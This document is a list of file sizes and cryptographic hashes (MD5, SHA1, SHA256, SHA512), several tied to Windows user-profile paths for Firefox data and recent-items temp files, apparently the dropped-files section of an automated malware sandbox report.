SHA512642de00dcdd0a534126bee113c7af9c82c1abfb80b6542bcfc5a5a76fc9d853c74d5d83ddaf7d79d2dd9a4a7346630ede6c1eed363cf04a8f943977ecf8f0688
-
Filesize
653KB
MD5ef1a41879a5f0af1ab0f33b95234c541
SHA1949047d760a5264efe2926d713ca0ec7de73a32d
SHA2569222b086086107816a343f4bdf8a9325fa4b3de8ac5a91fb841408dc6232e5a8
SHA512d0ef0ab5f808f549a0dba055a1f39727632026de0fcb5c2fa258e54769dbbc5b8e6775e5b0a7fe98e29ec33dedae3f4c85cda6d66b492938b581c4ba7f34e30b
-
Filesize
668KB
MD5b18f8e79d57e5cd45220280e4f71f3f4
SHA1b7329637a33a3e7de9a81bd48015c4fd71e09bc5
SHA256d2f2a0bfea0b6106e91980dd2e32d810b8e4e8b57ffd39ca15f411164f75113d
SHA5121a02e22a0d0fef0136452fed7b35f8104a8f878b65f2ef2a1db5607ff75c0fe0e2a08653e778d69982d9d505151be4f7e4e4caea559bbf0d137d6f5b93d90723
-
Filesize
679KB
MD52107ebf930fe9a3c256e14c3c963963a
SHA1d44730b0449ce3fcfabf6af4c0e4a7215f072957
SHA2565fa95c813f509528d79b1dc0d5f6e74a17ec6ffdbec44eafcf255691ecda3db6
SHA512d7c668220f366d024b397cc747e6c4db4dd04e02ef4f673e66e810a4bb61d694f99a861f108cddb92fbfb573100581e8d1f763e2e90d9af79464ab16f4846baf
-
Filesize
1.7MB
MD5b2543a36f8ce89877605bfeb4da30f49
SHA1eec3ee3fd2b899f2d4c079dca6893722b3935466
SHA256fe3dac11a4eca778fdd78d4e10af5126d01c8d27ce62d7e80eb2d8936bc4aa3a
SHA512cc4968dc0afcef43ec1ce267456afed058a4516e90340fd77100e0c7b23fb034c81f6dac851585554ca3a80ef100640943b140f0d78267f2d2564b16b88d5643
-
Filesize
429KB
MD522892b8303fa56f4b584a04c09d508d8
SHA1e1d65daaf338663006014f7d86eea5aebf142134
SHA25687618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f
SHA512852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744
-
Filesize
938KB
MD5bca16a15a781405ca76ca609ba6d0706
SHA1ab20b36912b57d6d517de3c6f3de03e09e697ff5
SHA2560c728f610e98a16829b338089f3dca9bebf48e24e037dd9c680a15d9074ae278
SHA512812663a552839b5be1e8ff496a01bfbd19d15c1de485799cfbea3b71daab959ab58c61e49b7ffe2ca94fcde1c92492478a42aeb443fe1ac1485153d66651582c
-
Filesize
2KB
MD5189e4eefd73896e80f64b8ef8f73fef0
SHA1efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74
-
Filesize
6.2MB
MD5f4c67d14c28d6d8321cdb3f3b6ca2d0c
SHA1166b3eea42427c7cb7cdd302001583a1c6d6a1a6
SHA256ef1b3fca51235bcf240fd3f81f7c36b77b19a81be17921c6e68102d426f8edbc
SHA512b496d8c4354bdb5709a48ee10c086886c34512783e983e2a4b7d4a8ce29fa4a6699023e036730b0e08be0f3120e97a971e2d832c7f06b6eaac291dfd5be3745d
-
Filesize
2.0MB
MD5ecc9ed4ca107a8e693b9a7ec280a7be9
SHA1d17d2d289c18c7c60f7b470121a6bb7ab6f53a69
SHA25671c028566755b749b669208b88887f587d36db9b59a132efb32764c50694926e
SHA512b630a95e4d777d9f70c1f3d10c8d4d20105bffb864bd99cf40568ee59746706bd079da281817f61aafe1279990a4f82c826d0c0d7afe2335585e84abcdbe9fa0
-
Filesize
2.0MB
MD508c44733ebf514e573eb25c33885be15
SHA10c973c5230bb402eaaed029fa54064064b5fbb66
SHA256ad5c4429c78504924e145452ef36ab9dfa77d1d87e371854d84acf2bd7d1cc03
SHA512c7d858fc54c723abd95f0f34d2fee86623ecca06d118a801df73a277d2006172213785811f99444633bf1396139e6256fee6a5326fc998b71fc05eef4368e040
-
Filesize
881KB
MD52b6ab9752e0a268f3d90f1f985541b43
SHA149e5dfd9b9672bb98f7ffc740af22833bd0eb680
SHA256da3b1ac39de4a77b643a4e1c03fc793bad1b66bfd8624630de173004857972df
SHA512130879c67bfcea3a9fe553342f672d70409fe3db8466c3a28ba98400b04243ebf790b2cf7e4d08ca3034fd370d884f9cbdd31de6b5309e9e6a4364d3152b3ace
-
Filesize
2.0MB
MD5a6fb59a11bd7f2fa8008847ebe9389de
SHA1b525ced45f9d2a0664f0823178e0ea973dd95a8f
SHA25601c4b72f4deaa634023dbc20a083923657e578651ef1147991417c26e8fae316
SHA512f6d302afa1596397a04b14e7f8d843651bd72df23ee119b494144c828fa371497f043534f60ae5908bc061b593132617264b9d1ea4735dccd971abb135b74c43
-
Filesize
334KB
MD5d29f7e1b35faf20ce60e4ce9730dab49
SHA16beb535c5dc8f9518c656015c8c22d733339a2b6
SHA256e6a4ff786a627dd0b763ccfc8922d2f29b55d9e2f3aa7d1ea9452394a69b9f40
SHA51259d458b6ad32f7de04a85139c5a0351dd39fc0b59472988417ca20ba8ed6cb1d3d5206640d728b092f8460a5f79c0ab5cc73225fba70f8b62798ffd28ed89f1c
-
Filesize
1.8MB
MD518f32bcef124ab705ad4fa992b55bf6e
SHA139d6fcbf7b6c38251c5500d59f1ae8b6250a9bd6
SHA256214383c9abef4d71bf2dfe603f821524db858f5f7349400e6327cd4d76d7d0b4
SHA5127872de17b62ff245dc85e55ec7d46469f657cc9665cc5f3d432296e53e3828a3a3cebe8734f67706f28b50529f63e4eab3ec71a80d4bc710fd78d9de0bd448f8
-
Filesize
1.7MB
MD5d45d46d95218d83e0e5cb914f0a01354
SHA124cbb7c82476d687e88278ba1d36a8fb2046926b
SHA256931df5fb2fa246dd9b9199fbe01881c7436e583ba9d00b01efa65307a48a6573
SHA5128bd9e0760d654e340b2279addcede946e04155d6d7d24a89860b6dacd9471ad6f1452644f170c71703e7097707b94aa3e65a2787543e67efa6c0e999e99400a5
-
Filesize
947KB
MD59b6cdbfffdbb0b49c080ebff83f6cd17
SHA15240e1d512542ff9235a3660623c869d6293a6c1
SHA25671212b1bc5b0d33c6240c4bb1f53174f9021b2b3b2e30f6fdb460513a1affeeb
SHA512c3c9f72e96c2d0be32a3eca134ccbf14895b93313b415b4e78d74b781e6c71e5fb19e1fe91788e63fd7ffbdd58834a35dc6bcc09d26d4f5e8e2c0962221be0ef
-
Filesize
938KB
MD5dbad63c18e1dc2a424eaae9505463cc9
SHA182b44f70f542134cc51876dd97642d57b1fc81e3
SHA25672b866a0297880414a7e44773a025cdf7543b25c20c78954c6ecf929627245f7
SHA51230969f0c1511081b05be1b1e90ce6194b70655cd0b8cc4b11536e33eaa8da3281c9aa85562714a6a4112175e20227ea5bf0758f76a9e94bcc2b9e22f8b3ad537
-
Filesize
9.8MB
MD5db3632ef37d9e27dfa2fd76f320540ca
SHA1f894b26a6910e1eb53b1891c651754a2b28ddd86
SHA2560513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d
SHA5124490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd
-
Filesize
325KB
MD5f071beebff0bcff843395dc61a8d53c8
SHA182444a2bba58b07cb8e74a28b4b0f715500749b2
SHA2560d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec
SHA5121ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d
-
Filesize
2.0MB
MD5a1e7af1c51b24f212f57835c67118890
SHA117fd1e657c0b8dcecdf3845d0c973d0f2831c25e
SHA2562c8fd683e92818709b70cf5d718bfb17a56d3337b72275dabbac2cc368385d57
SHA5124ce13f4aa85f4c15380ecd8c533dbfa0e5c98dc5035de8152aa301ec73426b2fee71662d03495dd250eb18c61fc95c6f40113381ae9fc305f7f4c6cad851f592
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2NC3T9GY8I553KVFFXUH.temp
Filesize7KB
MD5709a9c949cbaa371858b51aa967d2836
SHA11f191f4cd62f17b5768f52032d377091409d8be7
SHA25655d063fd60a335ea37eb2fbcea113f915e6a063c86bf0f7cbf903b2dacbffc93
SHA512b2a7b93a9d75b2a080edebc3cb0497e85dd86843ea85b2743db5349f12647562b33188c4288e321d55d24f809b598dcf26416cdd3b2fecc67dd11acbb4757ac9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8EPN4HLBBGKCBDFW1EF0.temp
Filesize7KB
MD55a7eceeed225512f2fab346e3d29f4cc
SHA1c6ad9253538bd1958cd60f3a92f65ea35a8e3015
SHA2569c2e718ee791cfc551426e671b3383a6b053f2dd07de173588ac2c4525c42633
SHA512f66a93a53c11823298fae8a31648da13d1f0ce26be72b070cde3152ed401551ca56729f733a6016c4f2eecb06a50af44d8cc091bb7b09e289dcabe0e952d4d11
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5513d0575a627c89e0be14c60da78a917
SHA1b41213a5afb9dc5a3d6649bd7b1fcc502e7fc2d8
SHA25698f4f524863b291296e2b9ea157863f3cb9a40aa3f933bd048469b8d74449596
SHA512ca5f89e591316e99753d1f66361cd2a5b905a8d2f251b6fbdb32fd6bb5fe01bc2835e77bddb891bcb1d98d11ba9812f2315d83b03d43f1793912c1afe5261d91
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\398e2e52-e830-494b-a653-862b40655120
Filesize745B
MD5bb6a3182ea1e7880d66631984fbf11a9
SHA1080dac6e4210be903aa0d10f48563c63272179b8
SHA25606c53574092ca22b44b2c713282955ab4c3df1e19aa6f447f350943ab12ff55b
SHA512b10bf3b7c755f9a3115bd944a858bc8a42eeb0c3535184f2683f8170affae65b87763f3eb5f99457226c16b65c9ee2baa14a367cb44e991e3fa6f07049b841d6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\95dbf971-8478-4709-980b-145b2af9cbd6
Filesize11KB
MD5bdfce99b937ea6bddcb65603ea9680b6
SHA15b5b5396fe0e31ab388ba1ff0934b0d41b5cb99f
SHA256ee1f1efb5421f046d5476bdedeaf2f555773ac05c53bb8425ab16ebbecf0d0bb
SHA5127d515d4e2cbc1a695ba34f8c17f383dbba1c1b9177e5b74fc63c8e8bc9e86a64adf3348cffacc1bb420471662de0f2ee2415d69d683b56c19ca33684e5b5a9cd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD530e0c63faf2f91486e20c3e43ba08dfd
SHA1ca05d0d14a7aa333b525fabd052da83f765f669e
SHA256df7a5e2ba2ad25f89aaa62235536f21fc6bebab8c3742147325bd061dfc05a38
SHA5125648aec3934270bf593b22dda52a074c416cbbaecec353a4d5663fb274e472f3c4bf745d208af6366e8b02cb039ad9b8903b578099dffe55d095d4d311e19510
-
Filesize
2.1MB
MD534a6ac1fec0b84dac8301a70322231df
SHA18d9384ae55556cb5a5283a060cf8145a6b37d067
SHA256f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0
SHA51209a422872484ef19a1fc72371b08affd781c9571e96fc293a79df829b62b5188fa9124515e7384e652f333b42f097b6f9044ce37e359d8f9085edf06d28ae567